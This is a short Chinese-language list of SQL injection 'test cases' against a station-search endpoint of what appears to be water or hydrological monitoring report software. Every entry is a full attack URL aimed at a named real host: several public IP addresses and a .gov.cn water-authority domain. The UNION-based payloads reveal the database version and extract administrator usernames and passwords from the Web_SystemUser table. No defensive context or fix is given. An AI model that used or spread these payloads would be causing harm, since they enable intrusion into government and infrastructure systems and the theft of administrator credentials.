测试案例:
(1)http://218.108.53.214:3050
【报错注入】
http://218.108.53.214:3050/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(@@version),NULL--&stationType='KKK'&sqlWhere=
【获取管理员密码】
http://218.108.53.214:3050/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser),NULL--&stationType='KKK'&sqlWhere=
其他测试案例:
(2) http://218.86.6.48:3505
http://218.86.6.48:3505/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(@@version),NULL--&stationType='KKK'&sqlWhere=
http://218.86.6.48:3505/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser),NULL--&stationType='KKK'&sqlWhere=
(3)http://222.78.185.230:3505/
http://222.78.185.230:3505/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser),NULL--&stationType='KKK'&sqlWhere=
(4)http://yj.yywater.gov.cn
http://yj.yywater.gov.cn/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser),NULL--&stationType='KKK'&sqlWhere=
